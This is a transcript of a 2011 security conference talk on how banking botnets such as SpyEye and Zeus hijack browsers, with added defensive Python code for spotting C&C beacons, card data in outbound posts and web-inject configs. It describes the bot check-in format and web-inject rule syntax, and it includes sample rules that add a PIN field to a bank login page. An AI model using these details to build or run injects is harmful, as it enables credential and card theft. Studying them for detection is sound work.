This document discusses browser malware and botnets. It provides a taxonomy of browser malware classes and describes how bots and browsers can work collaboratively. Bots use custom SDKs and plugins to communicate with command and control servers using the browser interface. The document outlines how bots can exploit browsers to inject content and download other malware. It also describes how bots can fingerprint browsers, use browser exploit packs, take screenshots, grab form data, and steal credit card numbers by manipulating the browser.
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)
1. Botnets and Browsers
Brothers in the Ghost Shell
BruCon Security/Hacking Conference
Brussels, 19-20 September 2011
Aditya K Sood (Security Practitioner)
SecNiche Security | Department of Computer Science and Engineering
Michigan State University
2. Whoami !
Aditya K Sood
─ Founder, SecNiche Security Labs
● Independent Security Consultant, Researcher and Practitioner
● Worked previously for Armorize, Coseinc and KPMG
● Active Speaker at Security conferences
● Written Content – Virus Bulletin / ISSA / ISACA / CrossTalk / HITB / Hakin9 / Elsevier NESE|CFS
● LinkedIn : http://www.linkedin.com/in/adityaks
● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com
─ PhD Candidate at Michigan State University
● http://www.cse.msu.edu/~soodadit
3. Overview and Disclaimer
Benchmark
─ This talk discusses the infection model of browsers and bots
─ Botnets have many capabilities. Our target is only browsers and bots.
● Mainly exploitation of browsers.
─ This talk is not about simple botnet commands. Sorry !
─ Scope is third generation botnets and browser manipulation
─ This research relates to my own efforts and does not provide the view of any of my employers.
4. Agenda
Walking through the Agenda
─ Browser Malware Taxonomy
─ Bots & Browsers – Collaborative Design
─ Bots & Browsers – Exploitation Paradigm
─ Browser/ Bot – Web Injects & Web Fakes
─ Conclusion
7. Browser Malware Taxonomy
Class A – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
8. Browser Malware Taxonomy
Class B – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
9. Browser Malware Taxonomy
Class C – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
10. Infection Model – Malware Serving
Exploiting web vulnerabilities (XSS / SQL injection)
Obfuscated Code Injected
JavaScript eval() – The Evil Machine
Browser DOM Calls
Rendered Interactive Frames
Pointed to Malicious Domain
11. Drive by Downloads – Insidious Infection
Browser – Loads Malicious URL
Vulnerability in Browser is Exploited
Exploits trigger Shellcode
Malware Binary Dropped
Parasitic Infection Occurs in System
Malware installed and connects back
13. Browser Botnets: SDK
Custom Designed SDK
─ Botnets use a self-built SDK for infection purposes
─ Browser communication
● Bots use the SDK functions together with plugins to communicate back to the C&C through the browser interface
─ Concept of a Bot Development Kit (BDT), similar to an SDK
─ Example:
● SpyEye BDT
14. Bots and Custom Connector Plugin
Design of Plugins
● The bot requires a separate plugin to communicate back with the C&C server
● The bot sends critical information through GET requests
Why Is a Plugin Used?
● Provides modular control over the bots
● Updates the main bot executable present on the victim machine
● Updates the bot configuration directly through the admin panel
● Start/Stop for a bot plugin – depends on availability
What Type of Information?
● gate.php?guid=!USER-5C377A2CCF!046502F4&ver=10207&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=13A7F1B3&md5=b9c3cb2cdc66b1f4465fe56cc34040b2&plg=customconnector
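The gate.php check-in above is the kind of request a network defender can match on. The following Python is an added example (not from the slides and not SpyEye's own code) that parses such beacons out of proxy log lines and reports the fields a responder needs; the log format, client IPs and C&C hostname are constructed, and the field patterns are derived from the single request shown on the slide.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fields carried by the custom connector check-in shown on the slide:
# guid, ver, stat, ie, os, ut, ccrc, md5, plg. The subset below must be present
# before a request is treated as a bot beacon (assumption derived from that one sample).
REQUIRED_FIELDS = {"guid", "ver", "stat", "md5", "plg"}
# guid looks like !USER-5C377A2CCF!046502F4: a '!'-delimited machine/user tag plus a hex id
GUID_RE = re.compile(r"^![^!]+![0-9A-Fa-f]+$")
# md5 is the hash of the bot executable on the victim (cf. TakeBotExeMd5Callback)
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_checkin(url):
    """Return the beacon fields as a dict if url looks like a custom connector
    check-in to gate.php, otherwise None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("gate.php"):
        return None
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if not REQUIRED_FIELDS.issubset(query):
        return None
    if query["plg"] != "customconnector":
        return None
    if not GUID_RE.match(query["guid"]) or not MD5_RE.match(query["md5"]):
        return None
    return query


def scan_proxy_log(lines):
    """Scan constructed proxy log lines ('<ts> <client-ip> <method> <url>') and
    return one record per matching beacon with the fields a responder needs."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client_ip, url = fields[1], fields[3]
        beacon = parse_checkin(url)
        if beacon is None:
            continue
        hits.append({
            "client": client_ip,
            "c2_host": urlsplit(url).hostname,
            "guid": beacon["guid"],            # identifies the infected host to the panel
            "bot_version": beacon["ver"],
            "bot_md5": beacon["md5"],          # pivot: hash of the bot binary to hunt on disk
            "config_crc": beacon.get("ccrc"),
            "browser_ie": beacon.get("ie"),    # browser build reported to the C&C
            "os": beacon.get("os"),
            "user_type": beacon.get("ut"),
        })
    return hits


# Constructed sample log: the first line carries the exact request from the slide,
# the other two are benign look-alikes that must not match.
SAMPLE_LOG = """\
1316419200.123 10.0.0.12 GET http://c2.example.invalid/spyeye/gate.php?guid=!USER-5C377A2CCF!046502F4&ver=10207&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=13A7F1B3&md5=b9c3cb2cdc66b1f4465fe56cc34040b2&plg=customconnector
1316419201.456 10.0.0.13 GET http://www.example.com/index.php?page=gate.php
1316419202.789 10.0.0.14 GET http://shop.example.com/gate.php?guid=abc&ver=1
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The md5 and ccrc values in a hit give the responder the bot binary hash and configuration revision to pivot on during host triage.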
15. Bots and Custom Connector Plugin
Design of Plugins
● API in action
– TakeBotGuid / TakeBotVersion / TakeConfigCrc32Callback / TakeBotExeMd5Callback / TakePluginsListCallback
[Diagram: SpyEye Bot ↔ Custom Connector Plugin ↔ Gate.php (Get Page) ↔ Main Panel (input/output)]
15
16. Custom Connector Plugin
What Lies Beneath?
● A mediator between the bot and the main admin panel
● Capable of deciding whether or not to send a request to the C&C
● Sets up an encrypted channel between the C&C and itself
● Very productive for creating a decentralized, plugin-based botnet
Operations
● Update bot configuration – UPDATE_CONFIG
● Update bot executable – UPDATE
● Manage plugins – PLUGIN
● Load third-party exe – LOAD
19. Reality of the Bots
Inside Bot – Characteristics
● Works similarly to a ring-3 rootkit
– Hooking and hijacking in userland
– Performs injections into the web processes
● Hooks the HTTP communication interface
– Exploits browsers – on-the-fly content injection
● Infection = {Bots + Plugins}
20. Man In the Browser (MITB)
The Reality of MITB
● Malware (bot/trojan) with the ability to infect the victim's browser
● Capable of modifying web pages and performing illegitimate transactions
● Invisible to users and browsers
● Steals credit card numbers efficiently
● Spies on browser sessions
http://www.cronto.com/download/internet_banking_fraud_beyond_phishing.pdf
21. Browser – User Agent Fingerprinting
User Agent Fingerprinting
─ Detects the state of the browser running on the system
─ Provides a plethora of information about browser versions
● Typically required in order to serve the specific exploits that download the bots
[Flow: User visits a malware domain → Browser sends a User Agent string → Malware scans the User Agent string → Malware detects the browser version → Malware exploits the browser]
25. Browser Exploit Packs and Bots
Is This a Real Artifact?
─ Yes it is.
– BEPs are used in conjunction with botnets
– On successful exploitation, the bot is dropped onto the victim machine
– Harnesses the power of two different frameworks to deliver malware
– Some traces have been seen of ZEUS (botnet) + BlackHole (BEP)
26. Browser – Screen Scrapers
Why?
● Capture screenshots from the victim machine during bank transactions
● It is possible to capture whole-system screenshots, not only the browser activity
● Provides additional support to bots for data exfiltration
● Exploits system-level functions and generic modules
How?
─ The mouse cursor is the reference point and the center of the screenshot
─ Explicit rules are defined for capturing screenshots
─ Rules consist of the following parameters
● URL_MASK
● WIDTH
● HEIGHT
● MINIMUM_CLICKS
● MINIMUM_SECONDS
28. Browsers – Form Grabbing
Why?
─ Keylogging produces a plethora of data
─ Form grabbing – extracting data from the GET/POST requests
─ Based on the concept of hooking and DLL injection
─ Virtual Keyboards
● Their input still ends up in the POST requests that the form grabbing functionality captures
● No real protection against malware
29. Browsers – Form Grabbing
Facts and Reality
─ All botnets (banking, IRC, etc.) use this technique
─ Very hard to overcome the consequences
─ All browsers can be circumvented to execute illegitimate hooks
30. Credit Card Grabber – Verification
Why is credit card number stealing a success?
● Bots are always successful in extracting credentials from the POST request
● Question – don't bots make mistakes in extracting Credit Card (CC) numbers?
● Well, bots are very smart in nature. They use inbuilt CC plugins.
● CC Verification – the credit card number is verified against Luhn's algorithm before it is sent to the botnet database. Voilà!
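The same Luhn test that lets a bot discard false positives before exfiltration is what an egress or DLP rule can use to flag card data leaving the network. An added example that is not part of the talk; the form body is constructed and 4111 1111 1111 1111 is a standard Luhn-valid test number.

```python
"""Luhn-checked card-number detection for egress monitoring (added example, not from the
talk). The slide's point is that a Luhn pass turns a digit string into a plausible card
number; the same test lets a DLP/proxy rule flag card data in outbound form posts. The
form body below is constructed; 4111 1111 1111 1111 is a standard Luhn-valid test number."""
import re
from urllib.parse import unquote_plus

# 13-19 digits, optionally separated by single spaces or dashes, not part of a longer run.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(number):
    """True if the digit string (13-19 digits) satisfies the Luhn checksum."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # every second digit from the right is doubled ...
            d *= 2
            if d > 9:
                d -= 9          # ... and reduced back to a single digit
        total += d
    return total % 10 == 0


def find_card_numbers(body):
    """Return Luhn-valid candidates in a form body, masked to their last four digits."""
    decoded = unquote_plus(body)      # form data arrives URL-encoded
    found = []
    for match in CANDIDATE.finditer(decoded):
        raw = re.sub(r"[ -]", "", match.group())
        if luhn_valid(raw):
            found.append("*" * (len(raw) - 4) + raw[-4:])
    return found


# Constructed POST body: a valid test card number, a 16-digit string that fails Luhn,
# and a 13-digit order id that also fails Luhn. Only the first should be reported.
SAMPLE_BODY = ("name=J+Doe&card=4111+1111+1111+1111"
               "&alt=4111111111111112&order=1234567890123")

if __name__ == "__main__":
    print(find_card_numbers(SAMPLE_BODY))   # ['************1111']
```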
32. Web Injects – Infection on the Fly
Web Injects
─ Injecting malicious content into the incoming request
─ The web page is tampered with but still looks legitimate
● The primary aim is to inject credential-stealing forms and input tags
● A similar concept is used to inject pointers to remote malware sites
● Concept of Third Generation Botnets (Give me your money)
33. Web Injects – How?
Web Injects
─ Hooking
● Long-lived exploitation technique
─ Browser Libraries
● Hooking nspr4.dll and wininet.dll
– IAT hooking, inline hooking or DLL injection
● webinjects.txt
– Rule file used for defining injection metrics (discussed in the next part)
– Used for debugging purposes, to test and verify the injections before the actual bot performs the infection
– The exploitation is done on the HTTP responses returning from the server
34. Web Injects – Log Detection
http://secniche.blogspot.com/2011/07/spyeye-zeus-web-injects-parameters-and.html
36. Web Injects – Metrics
What is meant by GPH flags?
─ Exploitation and infection metrics
● G – injection will be made only for resources requested by GET
● P – injection will be made only for resources requested by POST
● L – flag for grabbing the content between the tags data_before and data_after, inclusive
● H – similar to L, except that the ripped content does not include the contents of the tags data_before and data_after
37. Web Injects – Zeus and SpyEye
Web Injects
─ Sequence of metrics (as discussed earlier)
● SpyEye – the sequence must follow data_before, data_inject, data_after
● Zeus – the sequence does not matter
─ Injection content
● SpyEye requires specific rules to be designed using set_url
● Zeus primarily injects malicious Cascading Style Sheets (CSS) and JavaScript (JS)
─ Source – bots
● Zeus and SpyEye bots perform the requisite infection
● The bot reads the configuration parameters through the plugin interface
● The browser's HTTP communication channel is infected
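Parsing a recovered rule file to list targeted URL masks and the GPH flags described on the previous two slides, as an added example that is neither the talk's nor either bot's code: it assumes the Zeus-style layout in which each data_* section is closed by a data_end line, and the rules themselves are constructed.

```python
# Triage parser for a Zeus/SpyEye-style webinjects.txt (added example, not from the talk).
# Assumes the Zeus layout: `set_url <mask> <flags>`, then data_before / data_inject /
# data_after sections each closed by data_end. The rule text below is constructed.
SECTIONS = ("data_before", "data_inject", "data_after")

# Constructed rules: add an input to a login form (GP); grab a balance cell on GET (GL).
SAMPLE_RULES = """\
set_url https://bank.example.invalid/login* GP
data_before
<input type="password"*>
data_end
data_inject
<input type="text" name="pin" placeholder="ATM PIN">
data_end
data_after
</form>
data_end
set_url https://bank.example.invalid/balance* GL
data_before
<td class="balance">
data_end
data_inject
data_end
data_after
</td>
data_end
"""


def parse_webinjects(text):
    """Return one dict per set_url block: url mask, flags and the three data_* sections."""
    rules, current, section = [], None, None
    for line in text.splitlines():
        if line.startswith("set_url"):
            _kw, url, *flags = line.split()
            current = {"url": url, "flags": "".join(flags).upper(), **{s: [] for s in SECTIONS}}
            rules.append(current)
        elif line in SECTIONS:
            section = line
        elif line == "data_end":
            section = None
        elif section and current is not None:
            current[section].append(line)   # body lines belong to the open section
    return rules


def classify(rule):
    """('grabber'|'injector', methods): L/H rip content out, otherwise content is injected."""
    flags = set(rule["flags"])
    kind = "grabber" if flags & {"L", "H"} else "injector"
    methods = [m for f, m in (("G", "GET"), ("P", "POST")) if f in flags]
    return kind, methods
```

The url masks are what an analyst reports as targeted institutions; the L/H rules show which page content the bot harvests rather than modifies.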
38. Web Fakes
Understanding Web Fakes
● Plugins used to spoof content in browsers
● Supports both protocols, HTTP and HTTPS
● Based on the concept of internal URL redirection
● All browsers are affected
How?
─ Plugins use the metrics defined in the configuration file
● URL_MASK
● URL_REDIRECT
● FLAGS
● POST_BLACK_MASK
● POST_WHITE_MASK
● BLOCK_URL
● WEBFAKE_NAME
● UNBLOCK_URL
42. Conclusion
So What!
─ The success of third generation botnets greatly depends on browsers
─ The browser has become the most predominant part of exploitation
─ Dropping bots using Drive-by Downloads is an easy process
─ Hooking the browser is not a major hurdle
─ Bot Development Kits (BDKs) are in action
─ The browser is the main window to the internet, and so is the risk
─ Hard to prevent malware that resides inside browsers
─ Plugins/add-ons are also responsible for circumventing browser security
─ Protection requires much more effort than at present
43. Questions / Thanks
BruCon Crew
─ For all the support and help
SecNiche Security Labs
─ All my team members for their cooperation
Contact
─ LinkedIn – http://www.linkedin.com/in/adityaks
─ Twitter - @AdityaKSood